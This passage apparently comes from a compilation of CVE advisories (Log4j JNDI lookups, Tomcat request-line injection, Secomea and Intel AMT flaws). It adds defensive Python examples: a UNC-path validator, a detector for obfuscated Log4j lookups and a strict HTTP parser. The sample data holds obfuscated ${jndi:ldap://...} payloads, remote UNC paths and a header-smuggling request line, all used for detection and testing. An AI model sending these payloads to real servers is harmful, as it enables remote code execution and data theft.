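The fix class for this kind of issue is to validate a user-supplied data source path before the platform's file APIs ever see it, rejecting every spelling of a UNC or remote reference rather than only the obvious one. The following validator is an added example, not Solr's code: it checks a path against a hypothetical allowed root, folds forward and back slashes, rejects \\host\share, \\?\UNC\ and device paths, rejects file:// URLs that name a remote host, and confirms the normalized result still sits under the root so ..\ segments or another drive letter cannot leave it. The allowed root C:\solr\data and the sample inputs are constructed for illustration; the 203.0.113.0/24 addresses are a documentation range.

```python
"""Reject UNC, remote-URL and traversal forms of a user-supplied Windows path before use."""
import ntpath
from typing import Optional
from urllib.parse import urlparse


def reject_reason(user_path: str, allowed_root: str) -> Optional[str]:
    """Return why user_path must be rejected, or None if it is a local path inside allowed_root.

    allowed_root is a Windows directory such as C:\\solr\\data (hypothetical).
    ntpath is used so the Windows rules apply wherever this runs."""
    if "\x00" in user_path:
        return "NUL byte in path"
    # file://host/share smuggles a UNC host through the URL authority; only a host-less file URL passes
    if "://" in user_path or user_path.lower().startswith("file:"):
        url = urlparse(user_path)
        if url.scheme.lower() != "file":
            return f"scheme {url.scheme!r} not allowed"
        if url.netloc and url.netloc.lower() != "localhost":
            return f"file URL names remote host {url.netloc!r}"
        candidate = url.path          # file:////host/share leaves the host in the path; caught below
    else:
        candidate = user_path
    # Windows accepts both separators, so fold them before looking for a UNC or device prefix
    normalized = candidate.replace("/", "\\")
    if normalized.startswith("\\\\"):
        return "UNC or device path"
    # Anchor under the allowed root; a rooted path, ..\ segment or other drive must not escape it
    root = ntpath.normpath(allowed_root).rstrip("\\").lower()
    full = ntpath.normpath(ntpath.join(allowed_root, normalized)).lower()
    if ntpath.splitdrive(full)[0] != ntpath.splitdrive(root)[0]:
        return "escapes allowed root"
    if full != root and not full.startswith(root + "\\"):
        return "escapes allowed root"
    return None


# Constructed inputs an import handler might receive (not from any real deployment)
SAMPLE_ROOT = r"C:\solr\data"
SAMPLE_PATHS = [
    r"imports\feed.xml",
    r"\\203.0.113.10\share\feed.xml",
    r"//203.0.113.10/share/feed.xml",
    r"\\?\UNC\203.0.113.10\share\feed.xml",
    "file://203.0.113.10/share/feed.xml",
    "file:////203.0.113.10/share/feed.xml",
    r"..\..\Windows\win.ini",
    r"D:\other\feed.xml",
]

if __name__ == "__main__":
    for path in SAMPLE_PATHS:
        print(f"{path!r:45} -> {reject_reason(path, SAMPLE_ROOT) or 'accepted'}")
```

Only the first sample is accepted; every other spelling is refused before any SMB connection could be initiated on the attacker's behalf.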
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data, when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC), to craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
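The three Log4j items above (the MobileIron module that stands up an LDAP server, the incomplete 2.15.0 fix, and the original JNDI lookup issue) all hinge on the same mechanism: Log4j evaluates ${...} lookups in logged text, innermost first, and nested lookups such as ${lower:j} or ${::-j} resolve to plain characters, which is how "${jndi:" is hidden from naive string matching. The detector below is an added example, not code from Log4j, Metasploit or the cited advisories: it re-implements just enough of the lookup grammar (lower, upper, env with a :- default, and the empty-key default trick) to normalize nested input and report the ${jndi:...} lookup that would have fired. The sample request lines are constructed, with 203.0.113.0/24 as a documentation address range.

```python
"""Normalize nested Log4j 2 lookups to expose obfuscated JNDI strings in logged input."""
import re
from typing import Dict, List, Optional, Tuple

# A lookup with no other lookup nested inside it; these are resolved first, as Log4j would
INNERMOST = re.compile(r"\$\{([^${}]*)\}")


def _evaluate(body: str, env: Dict[str, str]) -> str:
    """Evaluate one innermost lookup body. Unknown lookups resolve to their ':-' default or ''."""
    key, has_default, default = body.partition(":-")   # "${::-j}" has an empty key and default "j"
    prefix, _, arg = key.partition(":")
    prefix = prefix.lower()
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    if prefix == "env":
        return env.get(arg, default if has_default else "")
    # date, sys, ctx and any unrecognized prefix: the value is irrelevant for detection,
    # only the default branch can contribute characters to a hidden lookup
    return default if has_default else ""


def detect_jndi(text: str, env: Optional[Dict[str, str]] = None, max_rounds: int = 32) -> Tuple[bool, str]:
    """Return (flagged, detail); detail is the normalized ${jndi:...} lookup when flagged."""
    env = env or {}
    current = text
    for _ in range(max_rounds):
        match = INNERMOST.search(current)
        if match is None:
            return False, current
        body = match.group(1)
        if body.lower().startswith("jndi:"):
            return True, "${" + body + "}"
        current = current[:match.start()] + _evaluate(body, env) + current[match.end():]
    return True, current     # nesting deeper than any legitimate pattern: treat as hostile


def scan(lines: List[str], env: Optional[Dict[str, str]] = None) -> List[str]:
    """Normalized JNDI lookups found in the given lines, in order."""
    hits = []
    for line in lines:
        flagged, detail = detect_jndi(line, env)
        if flagged:
            hits.append(detail)
    return hits


# Constructed request log lines (not real traffic)
SAMPLE_REQUESTS = [
    'GET /login HTTP/1.1 UA="Mozilla/5.0"',
    'GET / HTTP/1.1 UA="${jndi:ldap://203.0.113.10:1389/a}"',
    'GET / HTTP/1.1 UA="${${lower:j}ndi:${lower:l}dap://203.0.113.10:1389/a}"',
    'GET / HTTP/1.1 UA="${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.10:1099/x}"',
    'GET / HTTP/1.1 UA="${${env:NOPE:-j}ndi:${upper:ldap}s://203.0.113.10/x}"',
    'GET / HTTP/1.1 UA="${date:yyyy}"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print("JNDI lookup after normalization:", hit)
```

Four of the six sample lines are flagged; the literal "jndi:" appears in only one of them, which is the point of normalizing before matching. The round limit also bounds the work an attacker can force with deeply nested input.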
An improper access control vulnerability in the web service of Secomea SiteManager allows a local attacker without credentials to gather network information and configuration of the SiteManager. This issue affects Secomea SiteManager, all versions prior to 9.5, on hardware.
Multiple buffer overflows in Active Management Technology (AMT) in Intel Manageability Engine Firmware 8.x/9.x/10.x/11.0/11.5/11.6/11.7/11.10/11.20 allow an attacker with local access to the system to execute arbitrary code with AMT execution privilege.
The code in Apache Tomcat 9.0.0.M1 to 9.0.0.M11, 8.5.0 to 8.5.6, 8.0.0.RC1 to 8.0.38, 7.0.0 to 7.0.72, and 6.0.0 to 6.0.47 that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web cache, perform an XSS attack and/or obtain sensitive information from requests other than their own.
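The attack described above needs two parsers that both accept a malformed request line but disagree about where its fields begin and end. The strict parser below is an added example, not Tomcat's code: it enforces the request-line grammar from RFC 7230 (a token method, a request-target with no whitespace or control bytes, exactly two single spaces, an HTTP/x.y version and a CRLF terminator), and a deliberately lenient parser beside it shows how a permissive front end can read the same bytes differently. The request lines are constructed samples.

```python
"""Strict HTTP/1.1 request-line validation beside a lenient parser that disagrees with it."""
import re
from typing import Tuple

# RFC 7230 tchar: the only characters allowed in a method token
TCHAR = set("!#$%&'*+-.^_`|~0123456789"
            "abcdefghijklmnopqrstuvwxyz"
            "ABCDEFGHIJKLMNOPQRSTUVWXYZ")
VERSION_RE = re.compile(r"^HTTP/\d\.\d$")


class BadRequestLine(ValueError):
    """Raised for anything outside request-line = method SP request-target SP HTTP-version CRLF."""


def parse_request_line(raw: bytes) -> Tuple[str, str, str]:
    """Strict parse: returns (method, target, version) or raises BadRequestLine."""
    if not raw.endswith(b"\r\n"):
        raise BadRequestLine("missing CRLF terminator")
    try:
        text = raw[:-2].decode("ascii")
    except UnicodeDecodeError:
        raise BadRequestLine("non-ASCII byte in request line")
    parts = text.split(" ")                   # only a single SP separates fields
    if len(parts) != 3:
        raise BadRequestLine("request line must be exactly three SP-separated fields")
    method, target, version = parts
    if not method or any(c not in TCHAR for c in method):
        raise BadRequestLine("method contains a non-token character")
    if not target or any(ord(c) <= 0x20 or ord(c) == 0x7F for c in target):
        raise BadRequestLine("request-target contains whitespace or a control character")
    if not VERSION_RE.match(version):
        raise BadRequestLine("malformed HTTP-version")
    return method, target, version


def lenient_parse_request_line(raw: bytes) -> Tuple[str, str, str]:
    """Permissive parse of the kind the advisory warns about: any run of SP, HTAB, VT or FF
    separates fields, extra fields are silently ignored, and bare LF is tolerated."""
    text = raw.decode("latin-1").rstrip("\r\n")
    fields = re.split(r"[ \t\x0b\x0c]+", text)
    if len(fields) < 3:
        raise BadRequestLine("too few fields")
    return fields[0], fields[1], fields[2]


def verdict(raw: bytes) -> str:
    """'accepted' or 'rejected: <reason>' under the strict parser."""
    try:
        parse_request_line(raw)
    except BadRequestLine as exc:
        return f"rejected: {exc}"
    return "accepted"


# Constructed request lines: one valid, the rest malformed in ways a lenient parser may still accept
SAMPLE_LINES = [
    b"GET /index.html HTTP/1.1\r\n",
    b"GET /a\tb HTTP/1.1\r\n",                      # tab inside the target
    b"G{T / HTTP/1.1\r\n",                          # non-token method
    b"GET  / HTTP/1.1\r\n",                         # double space
    b"GET / HTTP/1.1\x0bX-Injected: 1\r\n",         # vertical tab smuggles extra data
    b"GET / HTTP/1.1\n",                            # bare LF terminator
    b"GET /a\tHTTP/1.1 /admin HTTP/1.1\r\n",        # strict: 4 fields; lenient: target /a
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        strict = verdict(line)
        try:
            lenient = lenient_parse_request_line(line)
        except BadRequestLine as exc:
            lenient = f"rejected: {exc}"
        print(f"{line!r:45} strict={strict!r} lenient={lenient!r}")
```

The last sample is the interesting one: the strict parser refuses it outright, while the lenient parser returns a target of /a and drops the rest, so a proxy and an origin with different rules would not even agree on which resource was requested. Rejecting at the first hop with a 400 is the only interpretation that cannot be exploited.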